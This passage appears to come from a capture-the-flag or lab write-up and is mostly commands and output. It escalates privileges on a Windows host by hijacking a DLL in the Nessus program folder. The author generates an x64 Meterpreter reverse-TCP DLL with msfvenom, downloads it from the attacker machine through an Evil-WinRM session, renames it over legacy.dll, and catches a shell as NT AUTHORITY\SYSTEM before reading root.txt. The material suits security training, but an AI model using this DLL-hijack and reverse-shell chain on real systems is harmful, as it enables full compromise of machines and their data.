-a---- 7/22/2025 9:35 PM 16 start
-a---- 7/22/2025 9:35 PM 16 stop
-a---- 7/23/2025 9:49 AM 9216 version.dll


*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> mv legacy.dll 2.dll
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> ls


Directory: C:\Program Files\Tenable\Nessus


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/18/2024 10:35 AM 1 .winperms
-a---- 7/23/2025 9:59 AM 9216 1.dll
-a---- 5/9/2024 11:30 PM 4988536 2.dll
-a---- 5/9/2024 11:30 PM 2471544 fips.dll
-a---- 5/9/2024 11:30 PM 5217912 icudt73.dll
-a---- 5/9/2024 11:30 PM 1575032 icuuc73.dll
-a---- 5/9/2024 11:06 PM 375266 License.rtf
-a---- 5/9/2024 11:37 PM 11204728 nasl.exe
-a---- 5/9/2024 11:31 PM 264824 ndbg.exe
-a---- 5/9/2024 11:06 PM 46 Nessus Web Client.url
-a---- 5/9/2024 11:33 PM 38520 nessus-service.exe
-a---- 5/9/2024 11:37 PM 11143800 nessuscli.exe
-a---- 5/9/2024 11:38 PM 11925624 nessusd.exe
-a---- 7/22/2025 9:35 PM 16 start
-a---- 7/22/2025 9:35 PM 16 stop
-a---- 7/23/2025 9:49 AM 9216 version.dll


*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> mv 1.dll legacy.dll
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> ls


Directory: C:\Program Files\Tenable\Nessus


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/18/2024 10:35 AM 1 .winperms
-a---- 5/9/2024 11:30 PM 4988536 2.dll
-a---- 5/9/2024 11:30 PM 2471544 fips.dll
-a---- 5/9/2024 11:30 PM 5217912 icudt73.dll
-a---- 5/9/2024 11:30 PM 1575032 icuuc73.dll
-a---- 7/23/2025 9:59 AM 9216 legacy.dll
-a---- 5/9/2024 11:06 PM 375266 License.rtf
-a---- 5/9/2024 11:37 PM 11204728 nasl.exe
-a---- 5/9/2024 11:31 PM 264824 ndbg.exe
-a---- 5/9/2024 11:06 PM 46 Nessus Web Client.url
-a---- 5/9/2024 11:33 PM 38520 nessus-service.exe
-a---- 5/9/2024 11:37 PM 11143800 nessuscli.exe
-a---- 5/9/2024 11:38 PM 11925624 nessusd.exe
-a---- 7/22/2025 9:35 PM 16 start
-a---- 7/22/2025 9:35 PM 16 stop
-a---- 7/23/2025 9:49 AM 9216 version.dll

Writing over the loaded DLL directly fails, so upload under another name and rename afterwards.

It failed again.

Silly me, the target is x64.

┌──(root㉿kali)-[/myift/bachang/win/nessus]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=8081 -f dll -o 2.dll --arch x64
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: 2.dll

------------------------------------------------------------------------------------------------------------

*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> Invoke-WebRequest -Uri http://192.168.56.103:8888/2.dll -OutFile 777.dll
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> ls


Directory: C:\Program Files\Tenable\Nessus


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/18/2024 10:35 AM 1 .winperms
-a---- 5/9/2024 11:30 PM 4988536 2.dll
-a---- 7/23/2025 10:28 AM 9216 777.dll
-a---- 5/9/2024 11:30 PM 2471544 fips.dll
-a---- 5/9/2024 11:30 PM 5217912 icudt73.dll
-a---- 5/9/2024 11:30 PM 1575032 icuuc73.dll
-a---- 5/9/2024 11:06 PM 375266 License.rtf
-a---- 5/9/2024 11:37 PM 11204728 nasl.exe
-a---- 5/9/2024 11:31 PM 264824 ndbg.exe
-a---- 5/9/2024 11:06 PM 46 Nessus Web Client.url
-a---- 5/9/2024 11:33 PM 38520 nessus-service.exe
-a---- 5/9/2024 11:37 PM 11143800 nessuscli.exe
-a---- 5/9/2024 11:38 PM 11925624 nessusd.exe
-a---- 7/22/2025 9:35 PM 16 start
-a---- 7/22/2025 9:35 PM 16 stop


*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> mv 777.dll legacy.dll

------------------------------------------------------------------------------------------------------------

msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.103:8081
[*] Sending stage (203846 bytes) to 192.168.56.156
[*] Meterpreter session 1 opened (192.168.56.103:8081 -> 192.168.56.156:49670) at 2025-07-22 22:29:48 -0400

meterpreter > shell
Process 3580 created.
Channel 1 created.
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Users\Administrator\Desktop>type root.txt
type root.txt
b5fc5a4ebfc20cc18220a814e1aee0aa